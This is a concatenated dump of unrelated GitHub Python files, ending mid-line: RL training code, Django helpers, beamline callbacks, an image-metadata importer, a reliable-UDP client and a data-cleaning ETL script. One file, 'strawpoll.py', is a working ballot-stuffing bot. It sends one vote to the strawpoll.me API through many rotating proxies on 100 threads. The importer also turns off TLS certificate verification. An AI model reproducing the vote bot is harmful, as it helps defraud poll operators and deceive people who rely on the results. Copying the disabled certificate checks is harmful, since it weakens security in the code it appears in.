index=False)\n target_pos.to_excel(target_pos_filepath, index=False)'''\n\n # plot action map\n ''' \n x = np.arange(0.5,0,-0.05)\n x2 = np.arange(0.5,1,0.05)\n x = np.sort(np.concatenate(([0], x, x2[1:], [1])))\n grid_scale = len(x)\n\n arrow_positions_x = np.zeros((grid_scale, grid_scale))\n arrow_positions_y = np.zeros((grid_scale, grid_scale))\n arrow_weight = np.zeros((grid_scale, grid_scale))\n\n arrow_dir_x = np.zeros((grid_scale, grid_scale))\n arrow_dir_y = np.zeros((grid_scale, grid_scale))\n grid_step = 0.05\n\n # put the position\n for i in range(grid_scale-1):\n for j in range(grid_scale-1):\n arrow_positions_x[i, j] = x[i]\n arrow_positions_y[i,j] = x[j]\n action, prob, _ = self.model.get_action(np.array([arrow_positions_x[i, j],arrow_positions_y[i,j]]))\n arrow_weight[i,j] = prob\n # up\n if action == 0:\n arrow_dir_x[i, j] = 0\n arrow_dir_y[i, j] = 1\n # right\n if action == 1:\n arrow_dir_x[i, j] = 1\n arrow_dir_y[i, j] = 0\n # down\n if action == 2:\n arrow_dir_x[i, j] = 0\n arrow_dir_y[i, j] = -1\n #left\n if action == 3:\n arrow_dir_x[i, j] = -1\n arrow_dir_y[i, j] = 0\n\n fig, ax = plt.subplots(figsize=(grid_scale, grid_scale))\n target = plt.Rectangle((0.45, 0.9), 0.1, 0.1, fc='red')\n ax.quiver(arrow_positions_x, arrow_positions_y, arrow_dir_x, arrow_dir_y, pivot='mid', scale=100, linewidths=arrow_weight.flatten()*0.01, edgecolors='k')\n ax.add_patch(target)\n #plt.show()\n plt.savefig('ActionProbs_{}_seed_{}_algo_{}.png'.format(self.config.max_episodes, self.config.seed, self.config.algo_name))'''\n\n\n\n '''if self.config.debug and self.config.env_name == 'NS_Reco':\n\n fig1, fig2 = plt.figure(figsize=(8, 6)), plt.figure(figsize=(8, 6))\n ax1, ax2 = fig1.add_subplot(1, 1, 1), fig2.add_subplot(1, 1, 1)\n\n action_prob = np.array(action_prob).T\n true_rewards = np.array(true_rewards).T\n\n for idx in range(len(dist)):\n ax1.plot(action_prob[idx])\n ax2.plot(true_rewards[idx])\n\n plt.show()'''\n\n '''def train_multiple(self):\n # Learn the model on the environment\n return_array = np.zeros((1,self.config.max_episodes))\n true_rewards = []\n action_prob = []\n return_history = []\n\n ckpt = self.config.save_after\n rm_history, regret, rm, start_ep = [], 0, 0, 0\n # if self.config.restore:\n # returns = list(np.load(self.config.paths['results']+\"rewards.npy\"))\n # rm = returns[-1]\n # start_ep = np.size(returns)\n # print(start_ep)\n\n steps = 0\n t0 = time()\n for episode in range(start_ep, self.config.max_episodes):\n # Reset both environment and model before a new episode\n\n state = self.env.reset()\n self.model.reset()\n\n step, total_r = 0, 0\n done = False\n while not done:\n # self.env.render(mode='human')\n action, extra_info, dist = self.model.get_action(state)\n new_state, reward, done, info = self.env.step(action=action)\n self.model.update(state, action, extra_info, reward, new_state, done)\n state = new_state\n\n # Tracking intra-episode progress\n total_r += reward\n # regret += (reward - info['Max'])\n step += 1\n if step >= self.config.max_steps:\n break\n\n # track inter-episode progress\n # returns.append(total_r)\n steps += step\n # rm = 0.9*rm + 0.1*total_r\n rm += total_r\n return_array[0, episode] = total_r\n if episode%ckpt == 0 or episode == self.config.max_episodes-1:\n rm_history.append(rm)\n return_history.append(total_r)\n if self.config.debug and self.config.env_name == 'NS_Reco':\n action_prob.append(dist)\n true_rewards.append(self.env.get_rewards())\n\n print(\"{} :: Rewards {:.3f} :: steps: {:.2f} :: Time: {:.3f}({:.5f}/step) :: Entropy : {:.3f} :: Grads : {}\".\n format(episode, rm, steps/ckpt, (time() - t0)/ckpt, (time() - t0)/steps, self.model.entropy, self.model.get_grads()))\n\n # self.model.save()\n utils.save_plots(return_history, config=self.config, name='{}_rewards'.format(self.config.seed))\n\n t0 = time()\n steps = 0\n return return_array'''\n\n def fromTargetToStr(self, target):\n if target == [0, 0]:\n return \"TopLeft\"\n elif target == [0, 4]:\n return \"TopRight\"\n elif target == [4, 4]:\n return \"BotRight\"\n elif target == [4, 0]:\n return \"BotLeft\"\n\n\n# @profile\ndef main(train=True, inc=-1, hyper='default', base=-1):\n t = time()\n args = Parser().get_parser().parse_args()\n save = True\n\n # Use only on-policy method for oracle\n if args.oracle >= 0:\n args.algo_name = 'ONPG'\n\n if inc >= 0 and hyper != 'default' and base >= 0:\n args.inc = inc\n args.hyper = hyper\n args.base = base\n\n\n n_seeds = 30\n # Training mode\n if train:\n for i in range(n_seeds):\n args.seed = i\n config = Config(args)\n solver = Solver(config=config)\n solver.train()\n\n print(\"Total time taken: {}\".format(time() - t))\n\n ''' \n if (save):\n with open(\"{}_Model_max_ep_{}_seed_{}\".format(args.algo_name, args.max_episodes, args.seed), \"wb\") as file_:\n pickle.dump(solver, file_, -1)'''\n\n\n\nif __name__ == \"__main__\":\n main(train=True)\n\n","repo_name":"JacopoSilvestrin/OptFuture_NSMDP","sub_path":"run_NS.py","file_name":"run_NS.py","file_ext":"py","file_size_in_byte":19845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"41658253028","text":"from django.http import JsonResponse\nfrom django.db.models import Q\n\nfrom apps.match.models import Match\n\n\ndef active_turn(function):\n\n def _inner(self, request, *args, **kwargs):\n query = Q(player1=request.player)\n query.add(Q(player2=request.player), Q.OR)\n query.add(Q(pk=kwargs['match_id']), Q.AND)\n match = Match.objects.filter(query).first()\n if not match:\n return JsonResponse({\"error\": \"Getting information of a match that does not exist or is not yours.\"})\n\n request.match = match\n request.is_player1 = match.player1 == request.player\n request.is_player2 = match.player2 == request.player\n\n return function(self, request, *args, **kwargs)\n\n return _inner\n\n\n","repo_name":"luisfilipedcc/whoiswho","sub_path":"apps/match/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"27734156669","text":"import asyncio\nimport logging\nimport functools\nimport time\nimport threading\nfrom collections import OrderedDict\n\nimport numpy as np\n\nfrom matplotlib.backends.qt_compat import QtCore\nfrom bluesky.callbacks.mpl_plotting import QtAwareCallback\n\nlogger = logging.getLogger(__name__)\n\n\ndef catch_exceptions(fcn):\n @functools.wraps(fcn)\n def wrapped(*args, **kwargs):\n try:\n return fcn(*args, **kwargs)\n except Exception as ex:\n logger.error('Function call failed: %s(%s, %s)', fcn, args, kwargs,\n exc_info=ex)\n raise\n\n return wrapped\n\n\nclass SubscanChecker:\n def __init__(self, subscan_rate):\n self._subscan_index = 0\n self._subscan_checker_enabled = False\n self._subscan_rate = subscan_rate\n\n def start_subscan_checker(self):\n if not self._subscan_checker_enabled:\n logger.debug('Starting subscan checker')\n self._subscan_checker_enabled = True\n self._schedule_subscan_check()\n\n def stop_subscan_checker(self):\n if self._subscan_checker_enabled:\n logger.debug('Stopping subscan checker')\n self._subscan_checker_enabled = False\n\n def _schedule_subscan_check(self):\n QtCore.QTimer.singleShot(int(self._subscan_rate * 1000), self.check_subscan)\n\n def check_subscan(self):\n\n if self._subscan_checker_enabled:\n\n flyer = self.flyer\n if flyer is not None and flyer.scan_count == 1:\n self.stop_subscan_checker()\n return\n\n try:\n if flyer is None or flyer.scan_count <= 1:\n pass\n else:\n last_index = self._subscan_index\n if flyer.scan_index > last_index:\n self._subscan_index = flyer.scan_index\n self.subscan_start(index=self._subscan_index)\n finally:\n self._schedule_subscan_check()\n\n\nclass FlyDataCallbacks(SubscanChecker, QtAwareCallback):\n def __init__(self, flyer=None, subscan_rate=0.5):\n SubscanChecker.__init__(self, subscan_rate=subscan_rate)\n QtAwareCallback.__init__(self)\n\n self.flyer = flyer\n self._run_header = None\n\n @catch_exceptions\n def start(self, doc):\n self._run_header = doc\n logger.debug('Run header: scan_id=%d (%s)', doc['scan_id'],\n self.__class__.__name__)\n\n self.scan_id = doc['scan_id']\n self.fast_axis = doc['fast_axis']\n dims = doc['shape']\n ndim = len(dims)\n self.num = np.product(dims)\n self._subscan_index = 0\n\n if ndim == 1:\n pass\n elif ndim == 2:\n self.start_subscan_checker()\n else:\n logger.error('Unsupported scan dimensions')\n return\n\n logger.debug('Number of points=%d', self.num)\n self.scan_started(doc, ndim, fast_axis=self.fast_axis,\n **doc['plan_args'])\n\n @catch_exceptions\n def stop(self, doc):\n if self.flyer is None:\n logger.error('Flyer unset - not running scan_finished')\n return\n\n flyer = self.flyer\n self.stop_subscan_checker()\n\n while not flyer.done:\n logger.debug('Waiting for flyscan to finish')\n time.sleep(0.2)\n\n scan_data = self.flyer.data.get(self.scan_id, {})\n\n finish_func = (self.scan_failed if flyer.failed\n else self.scan_finished)\n\n try:\n finish_func(doc, scan_data, cancelled=self.flyer.cancelled)\n finally:\n self._run_header = None\n self.flyer = None\n\n def scan_started(self, doc, ndim, **scan_kwargs):\n '''Re-implement me'''\n pass\n\n def scan_failed(self, doc, scan_data, **kwargs):\n '''Re-implement me'''\n pass\n\n def scan_finished(self, doc, scan_data, cancelled=False, **kwargs):\n '''Re-implement me'''\n pass\n\n def subscan_start(self, index=0, **kwargs):\n '''Re-implement me'''\n pass\n\n\ndef default_data_func(*arrays):\n return np.sum(arrays, axis=0)\n\n\nclass SignalDataHandler:\n def __init__(self, groups, data_func=None, point_signal=None):\n self.groups = groups\n self.point_signal = point_signal\n self.data_func = data_func\n self.signals = sum((signals for group, signals in groups.items()), [])\n self._updated = True\n self._lock = threading.RLock()\n self._calculated = None\n\n if point_signal is not None:\n point_signal.subscribe(self._value_updated)\n else:\n for sig in self.signals:\n sig.subscribe(self._value_updated)\n if not groups:\n raise ValueError('Must have at least one signal')\n\n @property\n def updated(self):\n '''Any signals changed since the last calculation?'''\n return self._updated\n\n def _value_updated(self, **kwargs):\n with self._lock:\n self._updated = True\n\n def get_group_data(self, key, npts):\n group_data = []\n for signal in self.groups[key]:\n try:\n value = signal.get(count=npts)\n except Exception as ex:\n logger.debug('Caget failed for signal %s', signal,\n exc_info=ex)\n value = None\n\n if value is not None:\n try:\n len(value)\n except TypeError:\n value = [value]\n\n if len(value) < npts:\n value = np.concatenate((value, [0] * (npts - len(value))))\n group_data.append(value)\n else:\n group_data.append(np.zeros(npts))\n return group_data\n\n @catch_exceptions\n def calc_data(self, npts):\n with self._lock:\n if not self._updated:\n return self._calculated\n elif npts <= 0:\n return OrderedDict((label, [])\n for label, signals in self.groups.items())\n\n data = OrderedDict()\n data_func = (self.data_func if self.data_func is not None\n else default_data_func)\n\n for label, signals in self.groups.items():\n group_data = self.get_group_data(label, npts)\n data[label] = data_func(*group_data)\n\n self._updated = False\n self._calculated = data\n\n return OrderedDict(self._calculated)\n\n @property\n def num_points(self):\n if self.point_signal is None:\n raise ValueError('No point signal set')\n\n return self.point_signal.get(use_monitor=False)\n\n\nclass SubscanDataHandler:\n def __init__(self, key_groups, data_func=None):\n self.key_groups = key_groups\n self.data_func = data_func\n\n def calc_data(self, flyer, scan_id):\n try:\n data = flyer.data[scan_id]\n except KeyError:\n return OrderedDict()\n\n data_func = (self.data_func if self.data_func is not None\n else default_data_func)\n return OrderedDict((main_key, data_func(*[data[key] for key in keys]))\n for main_key, keys in self.key_groups.items())\n","repo_name":"NSLS-II-HXN/hxnfly","sub_path":"hxnfly/callbacks/flydata.py","file_name":"flydata.py","file_ext":"py","file_size_in_byte":7318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"40156582234","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('oncall', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Slot',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('slot_id', models.IntegerField(default=1)),\n ],\n ),\n migrations.CreateModel(\n name='Teacher',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('first_name', models.CharField(max_length=20)),\n ('last_name', models.CharField(max_length=20)),\n ('email_address', models.EmailField(max_length=254)),\n ('slot', models.ForeignKey(default=None, to='oncall.Slot')),\n ],\n ),\n ]\n","repo_name":"brendan-kellam/GCS-On-Call-System","sub_path":"OnCallSystem/oncall/migrations/0002_slot_teacher.py","file_name":"0002_slot_teacher.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"40485340400","text":"import unittest\n\ndef is_legal_age(age):\n if age >= 18:\n return True\n else:\n return False\n\n\n \n\nclass Glass_Test(unittest.TestCase):\n\n def test_is_legal_age(self):\n age = 20\n\n result = is_legal_age(age)\n\n self.assertEqual(result, True)\n \n def test_is_not_legal_age(self):\n age = 15\n\n result = is_legal_age(age)\n\n self.assertEqual(result, False)\n \n \n\nif __name__ == \"__main__\":\n unittest.main(verbosity=2)","repo_name":"fernunex/Pensamiento-computacional-py","sub_path":"glass_box.py","file_name":"glass_box.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"27813146012","text":"\"\"\"\nKeys\n----\nS - Save wand pattern as an image (for data collection)\nQ - Quit\n\"\"\"\n\nimport cv2 as cv\nimport numpy as np\n\nimport os\nimport sys\nimport time\n\nclass SpellDetector:\n \"\"\"\n From the video stream, track the wand tip, determine what spell has been cast, and make magic!\n \"\"\"\n\n def __init__(self, video_src, spell_classifier, spellcaster):\n self.video_src = video_src\n self.spell_classifier = spell_classifier\n self.spellcaster = spellcaster\n\n # Frame properties\n self.frame_index = 0\n self.prev_frame = None\n\n # Background subtraction properties\n self.background_subtractor = cv.createBackgroundSubtractorMOG2(history=100, varThreshold=50, detectShadows=False)\n\n # Detection & tracking properties\n self.update_interval = 5\n self.feature_params = dict(\n maxCorners = 5,\n qualityLevel = 0.01,\n minDistance = 30)\n self.lk_params = dict(\n winSize = (25, 25),\n maxLevel = 7,\n criteria = (cv.TERM_CRITERIA_EPS | cv.TERM_CRITERIA_COUNT, 10, 0.03))\n\n # Wand properties\n self.wand_tracks = []\n self.wand_pattern = None\n self.spell = ''\n self.max_frames_since_no_new_points = 30\n self.frames_since_no_new_points = 0\n\n def run(self, is_remove_background_enabled=False):\n \"\"\"\n Run Spell Detector!\n \"\"\"\n\n cap = cv.VideoCapture(self.video_src) \n while(True):\n ret, frame = cap.read()\n if frame is None:\n break\n\n frame = cv.flip(frame, 1)\n frame_gray = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)\n\n if is_remove_background_enabled:\n frame_gray = self.remove_background(frame_gray, threshold_value=215)\n\n # Update points every x frames\n if self.frame_index % self.update_interval == 0:\n self.points = self.find_points(frame_gray)\n\n self.track_wand(frame_gray)\n\n self.frame_index += 1\n self.prev_frame = frame_gray\n\n # Display original video stream\n cv.imshow('Video Stream (RGB)', frame)\n\n # Press 'Q' to quit\n key = cv.waitKey(1)\n if key == ord('q'):\n break\n # Press 'S' to save wand pattern as an image\n elif key == ord('s'):\n if self.wand_pattern is not None:\n self.save_wand_pattern(self.wand_pattern)\n\n cap.release()\n cv.destroyAllWindows()\n\n def remove_background(self, frame_gray, threshold_value=200):\n \"\"\"\n Use background subtraction to improve wand tip detection.\n \"\"\"\n\n mask = self.background_subtractor.apply(frame_gray, learningRate=0.001)\n frame_no_bg = cv.bitwise_and(frame_gray, frame_gray, mask=mask)\n _, frame_thresholded = cv.threshold(frame_gray, threshold_value, 255, cv.THRESH_BINARY)\n\n cv.imshow('Background Removed (B/W)', frame_thresholded)\n\n return frame_thresholded\n\n def find_points(self, frame):\n \"\"\"\n Find points to track... like the wand tip.\n \"\"\"\n\n points = cv.goodFeaturesToTrack(frame, mask=None, **self.feature_params)\n\n vis = frame.copy()\n\n if points is not None:\n for p in points:\n x, y = p.ravel()\n cv.circle(vis, (x, y), 5, (255, 255, 255), thickness=-1)\n\n cv.imshow('Points', vis)\n\n return points\n\n def track_wand(self, frame):\n \"\"\"\n Track the wand tip.\n \"\"\"\n \n if self.prev_frame is None:\n return\n\n vis = frame.copy()\n\n if self.points is None:\n if len(self.wand_tracks) > 0:\n self.frames_since_no_new_points += 1\n\n # Predict and cast spell when no new frames have been added after specified interval\n if self.frames_since_no_new_points > self.max_frames_since_no_new_points:\n self.spell = self.predict_spell(self.wand_pattern)\n self.spellcaster.cast_spell(self.spell)\n \n # Reset\n self.wand_tracks.clear()\n self.frames_since_no_new_points = 0\n else:\n # Calculate optical flow\n new_points, status, err = cv.calcOpticalFlowPyrLK(self.prev_frame, frame, self.points, None, **self.lk_params)\n\n # Select good points\n if new_points is not None:\n good_new = new_points[status==1]\n\n # Update points for optical flow calculation\n self.points = good_new.copy().reshape(-1, 1, 2)\n\n # Add points to tracks array\n for p in self.points:\n x, y = p.ravel()\n self.wand_tracks.append([x, y])\n\n if len(self.wand_tracks) > 0:\n x0, y0 = self.wand_tracks[0]\n for track in self.wand_tracks:\n x1, y1 = track\n cv.line(vis, (x0, y0), (x1, y1), (255, 255, 255), thickness=10)\n\n x0, y0 = track\n\n self.spell = ''\n self.grab_wand_pattern(vis)\n \n cv.putText(vis, 'spell: %s' % self.spell, (10,20), cv.FONT_HERSHEY_PLAIN, 1.0, (255,255,255))\n cv.imshow('Tracked Points', vis)\n\n def grab_wand_pattern(self, frame):\n \"\"\"\n Grab the wand pattern.\n \"\"\"\n\n contours, _ = cv.findContours(frame, cv.RETR_EXTERNAL, cv.CHAIN_APPROX_SIMPLE)\n \n if not contours:\n return\n\n # Assume wand pattern is the first contour...\n contour = contours[0]\n\n # Then, crop the pattern\n x, y, w, h = cv.boundingRect(contour)\n cropped_frame = frame[y-10:y+h+10, x-10:x+w+10]\n\n if np.sum(cropped_frame) > 0:\n cropped_frame = cv.resize(cropped_frame, (100, 100))\n self.wand_pattern = cropped_frame.copy()\n\n cv.imshow('Wand Pattern', cropped_frame)\n\n def save_wand_pattern(self, frame, path='./data/'):\n \"\"\"\n Save the wand pattern as an image. Used for data collection & model training.\n \"\"\"\n\n filename = \"pattern_\" + str(time.time()) + \".png\"\n cv.imwrite(os.path.join(path, filename), frame)\n\n\n def predict_spell(self, wand_pattern):\n \"\"\"\n Predict the spell!\n \"\"\"\n\n # Reshape wand pattern frame to be (n_batch=1, height, widgth, n_channels=1)\n wand_pattern = wand_pattern[np.newaxis, :, :, np.newaxis]\n \n predictions = self.spell_classifier.model.predict(wand_pattern)\n predicted_label_index = np.argmax(predictions[0])\n predicted_spell = self.spell_classifier.classes[predicted_label_index]\n print(predicted_spell)\n \n return predicted_spell","repo_name":"estherjk/potter-pi","sub_path":"magic/detector.py","file_name":"detector.py","file_ext":"py","file_size_in_byte":6874,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"5"} +{"seq_id":"39033480337","text":"import numpy as np\nn_lines = 5000000\nn = np.arange(0, n_lines)\nom = np.pi / (n_lines/10.) * n\ny1 = np.sin(om)\ny2 = np.cos(2. * om)\nlines = [f'{{\"omega\": {om[i]}, \"y1\": {y1[i]}, \"y2\": {y2[i]}}}\\n' for i in n]\nwith open(f'my_data_{n_lines}.txt', 'w') as f:\n f.writelines(lines)\n\n\n","repo_name":"shkiefer/dash_large_files","sub_path":"st_make_data.py","file_name":"st_make_data.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"10655435534","text":"import requests, get_proxies, threading, queue\n\nq = queue.Queue()\nthreads_num = 100\npayload = {\"pollId\":6970091,\"votes\":[17]}\n\ndef poll(q):\n while not q.empty():\n proxy = q.get()\n try:\n r = requests.post('https://strawpoll.me/api/v2/votes', json=payload, timeout=20, proxies=proxy)\n print(r.json())\n except Exception: continue\n finally:\n q.task_done()\n print('Кол-во прокси в очереди: %s; Кол-во потоков: %s' %(q.qsize(), threading.active_count()))\n\nfor proxy in get_proxies.proxy_lst:\n q.put({'https': 'http://' + proxy})\n \nfor thr in range(threads_num):\n thr = threading.Thread(target=poll, args=(q,))\n thr.start()\n\nq.join()\n","repo_name":"anon276/testing","sub_path":"strawpoll/release/strawpoll.py","file_name":"strawpoll.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"16281105069","text":"from .base import Importer\nimport requests\nfrom subprocess import call\nimport time\nimport os.path\n\n\nclass MMSImporter(Importer):\n\n MMS_DEV='http://dev-mms.thlib.org/media_objects/'\n MMS_STAGE='http://staging-mms.thlib.org/media_objects/'\n MMS_PROD='http://mms.thlib.org/media_objects/'\n\n IIIF_LOC='~/Shares/iiif-live/shanti/'\n\n def __init__(self, id, cookie, out_path=None, photographer='Unknown', collection=None, *args, **kwargs):\n super().__init__(\n id=id,\n cookie=cookie,\n out_path=out_path,\n photographer=photographer,\n collection=collection,\n exists_url='/api/imginfo/mmsid/',\n *args,\n **kwargs\n )\n self.rsync = kwargs.get('rsync')\n self.force_rs = kwargs.get('force_rs')\n\n def _import_metadata(self):\n import_path = '/admin/shanti_images/import/json/'\n import_url = self.base + import_path + self.id\n headers = {\n 'Cookie': self.cookie\n }\n\n postdata = {\n 'mmsid': self.id,\n 'source': self.source,\n 'publish': True,\n 'photographer': self.photographer,\n 'coll': self.collection if self.collection else ''\n }\n if self.collection:\n postdata['image_coll_node'] = self.collection\n if self.photographer:\n postdata['default_agent'] = self.photographer\n\n res = requests.post(import_url, headers=headers, data=postdata, verify=False)\n\n if res.status_code != requests.codes.ok:\n self._log('warning', 'Non-200 status returned from POST for ID {}. Code was {}.'.format(\n self.id,\n res.status_code\n ))\n # print(\"Drupal site returned non-200 status: {}\".format(res.json()))\n\n if res.status_code == requests.codes.forbidden:\n self._log('debug',\n 'Forbidden response from POST to server. Likely the cookie is expired, ' +\n 'so the script will exit.')\n exit()\n\n return False\n\n else:\n # If everything went OK (200)\n self.res = res.json()\n\n if self.res and 'status' in self.res.keys():\n if self.res['status'] == '200':\n self._log('info', '200 status returned from POST for ID {}. Payload: {}.'.format(\n self.id,\n self.res\n ))\n return True\n else:\n self._log('info', 'Response from Server with Non-200 Status for ID {}: {} ({})'.format(\n self.id,\n self.res['message'],\n self.res['status']\n ))\n if self.res['status'] == '401':\n raise Exception('Authorization required for posting to server. Check your cookie!')\n else:\n return False\n else:\n self._log('warn', \"No response from server for ID {}\".format(self.id))\n return False\n\n # res.json() looks like this:\n # {\n # 'mmsid': '44301',\n # 'nid': '619213',\n # 'i3fid': 'shanti-image-loc-295724',\n # 'title': '(Untitled)',\n # 'durl': 'https://images.dd:8443/node/619213',\n # 'mmsurl': 'http://staging-mms.thlib.org/media_objects/44301',\n # 'status': '200',\n # 'msg': 'success'\n # }\n\n def _get_rsync(self, i3fid, mmsid):\n\n mmsid = str(mmsid).zfill(5)\n mmspath = mmsid[0:1].zfill(4) + '/' + mmsid[1:].zfill(4)\n srcimg = self.IIIF_LOC + 'prod/' + mmspath + '.jp2'\n destimg = self.IIIF_LOC + self.dest + '/' + i3fid + '.jp2'\n cmd = \"rsync -ah --progress {} {}\\n\".format(srcimg, destimg)\n return cmd\n\n @staticmethod\n def build_rsync(mid):\n info_url = 'https://images.shanti.virginia.edu/api/imginfo/mmsid/'\n mydest = 'prod'\n strmid = str(mid).zfill(5)\n url = info_url + strmid\n # print(\"Calling: {}\".format(url))\n try:\n indoc = requests.get(url, verify=False)\n if indoc and indoc.json():\n jdata = indoc.json()\n newimgnm = jdata.get('i3fid')\n folder = strmid[0:1].zfill(4)\n imgnm = strmid[1:].zfill(4)\n mysource = \"~/Shares/iiif-live/shanti/prod/{}/{}.jp2\".format(folder, imgnm)\n mydest = \"~/Shares/iiif-live/shanti/{}/{}.jp2\".format(mydest, newimgnm)\n mycmd = \"rsync -ah --progress {} {}\\n\".format(mysource, mydest)\n return mycmd\n except requests.exceptions.RequestException as e:\n print(\"Connection could not be made for {}\".format(url))\n return False\n\n def _exec_cmds(self, cmd, verbose=False):\n if self.rsync == 'auto':\n if verbose:\n print(\"Executing Cmd: \\n{}\".format(cmd))\n call(cmd, shell=True)\n elif cmd is not None:\n with open(self.out_path, 'a') as outf:\n outf.write(cmd)\n else:\n print(\"No command created for rsyncing!\")\n\n def _distribute(self, verbose=False):\n url = 'http://fuploadtest.lib.virginia.edu:8091/fupload/distribute'\n if self.dest == 'prod':\n url = url.replace('fuploadtest', 'fupload')\n res = requests.get(url)\n\n if res.status_code != requests.codes.ok:\n print(\"Could not distribute file on {}: {} - {]\".format(self.dest, res.status_code, res.json()))\n elif verbose:\n print(\"File distributed on {}: {}\".format(self.dest, res.json()))\n\n def run(self):\n sttm = time.time()\n idtype = \"List\" if self.id_list else \"Individual\"\n print(\"Beginning Import, Type: {}\".format(idtype))\n id_list = self.id_list if self.id_list else [int(self.id)]\n rsync_cmds = []\n be_verbose = True\n impct = 0\n skipct = 0\n probs = []\n # If a list of IDs are given\n try:\n for id in id_list:\n self.id = str(id)\n try:\n if self._already_imported():\n print(\"Id {} is already imported.\".format(self.id))\n skipct += 1\n if self.force_rs:\n rsync_cmds.append(self.build_rsync(self.id))\n else:\n print(\"Importing metadata for {} into {}\".format(self.id, self.base))\n success = self._import_metadata()\n if success:\n impct += 1\n rsync_cmds.append(self.build_rsync(self.id))\n else:\n probs.append(self.id)\n\n except requests.exceptions.RequestException as e:\n print(\"Unable to connect to MMS server for {}: {}\".format(self.id, e))\n probs.append(str(id))\n\n finally:\n # Only writes Rsync commands for records imported.\n # To recreate missed rsync commands, use the recover-mms-rsync.py script\n if self.rsync == 'file' and len(rsync_cmds) > 0:\n print(\"Creating Rsync commands ....\")\n if os.path.exists(self.out_path):\n answer = input(\"The outfile {} already exists. Write over it? \".format(self.out_path))\n if answer != 'y':\n return\n\n with open(self.out_path, 'w') as outf:\n for rcmd in rsync_cmds:\n outf.write(\"{}\".format(rcmd))\n\n endtm = time.time()\n timedelta = endtm - sttm\n print(\"{} file imported.\".format(impct))\n print(\"{} were skipped because already imported.\".format(skipct))\n print(\"{} imports had problems. Check log for details.\".format(len(probs)))\n print(\"There were problems with the following MMSIDs: {}\".format(', '. join(probs)))\n m, s = divmod(timedelta, 60)\n h, m = divmod(m, 60)\n print(\"Time elapsed: %d hrs %02d mins %02d secs\" % (h, m, s))\n\n\n","repo_name":"shanti-uva/mms_image_import","sub_path":"importers/mms.py","file_name":"mms.py","file_ext":"py","file_size_in_byte":8303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"25711475918","text":"#Team Members\r\n#Shubh Deep 2018A7PS0162H\r\n#Shivang Singh 2018A7PS0115H\r\n#Nishit Chouhan 2018A7PS0446H\r\n#Deepak George 2018A7PS0244H\r\nimport sys\r\nimport os\r\nsys.path.append(\"../\")\r\nfrom protocol_files.rudp_protocol import RUDP\r\nimport time\r\n\r\ndef chunks(lst, n):\r\n \"Yield successive n-sized chunks from lst\"\r\n list = []\r\n for i in range(0, len(lst), n):\r\n end = min(i + n, len(lst))\r\n list.append(lst[i:end])\r\n return list\r\n\r\nprint(\"im in client\")\r\nfilename = sys.argv[1]\r\nfilesize = os.path.getsize(filename)\r\ndata = (filename, filesize)\r\n\r\nr = RUDP(\"127.0.0.1\", 9001, False)\r\nr.connect_sock(\"127.0.0.1\", 9002)\r\nr.listen()\r\nwhile(r.is_conn_est == False):\r\n pass\r\nr.send(data)\r\nwith open(filename, \"rb\") as f:\r\n contents = f.read()\r\n # print(contents)\r\n list1 = chunks(contents, 2048)\r\n for chunk in list1:\r\n # print(\"chunk from client :\", chunk)\r\n r.send(chunk)\r\n# r.disconnect()","repo_name":"queenofthelosers/reliable-udp-middleware","sub_path":"server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"14252148448","text":"\"\"\"\nDisaster response pipeline project\nfunctions to pre-process data : run ETL pipeline that cleans data and stores in a sqlite database\n\nSample Script Execution:\n- To run ETL pipeline that cleans data and stores in database:\n > python data/process_data.py data/disaster_messages.csv data/disaster_categories.csv data/DisasterResponse.db\n\"\"\"\n\n# import packages\nimport sys\nimport pandas as pd\nfrom sqlalchemy import create_engine\n\n\ndef load_data(messages_filepath: str, categories_filepath: str):\n \"\"\"\n takes inputs as two csvs, combines them through 'id' and return the combined pandas data frame\n :param messages_filepath: csv file with messages and an unique id\n :param categories_filepath: csv file with categories and unique id\n :return: pandas data frame with merged messages and categories\n \"\"\"\n # import data from cv\n messages = pd.read_csv(messages_filepath)\n categories = pd.read_csv(categories_filepath)\n df = pd.merge(messages, categories, on='id')\n return df\n\n\ndef clean_data(df):\n \"\"\"\n - takes the input of pandas dataframe with column named 'categories' with data like below\n ex: related-1;request-0;offer-0;aid_related-0;\n - make a seperate set of columns by splitting from ; and getting the numbers specified there as relevant values\n ex : related | request | offer | aid_related\n 1 | 0 | 0 | 0\n - combine it with the df replacing the categories column with these new set of columns\n and drop duplicates\n :param df: python data frame with a column named categories\n :return: df_cleaned : pandas dataframe with categories column splitted by ; and relevant number\n \"\"\"\n # create a data frame by splitting data by ';' and creating seperate columns for each\n categories = df.categories.str.split(';', expand=True)\n # get the column names for added categories columns by extracting them from the first row of the dataframe\n firstrow = categories.iloc[0, :]\n category_colnames = firstrow.apply(lambda x: x[:-2])\n categories.columns = category_colnames\n # iterate through each column and keep the last character as 1/0\n for column in categories:\n categories[column] = categories[column].str[-1]\n categories[column] = categories[column].astype(int)\n # convert to binary\n categories.loc[categories[column] > 1, 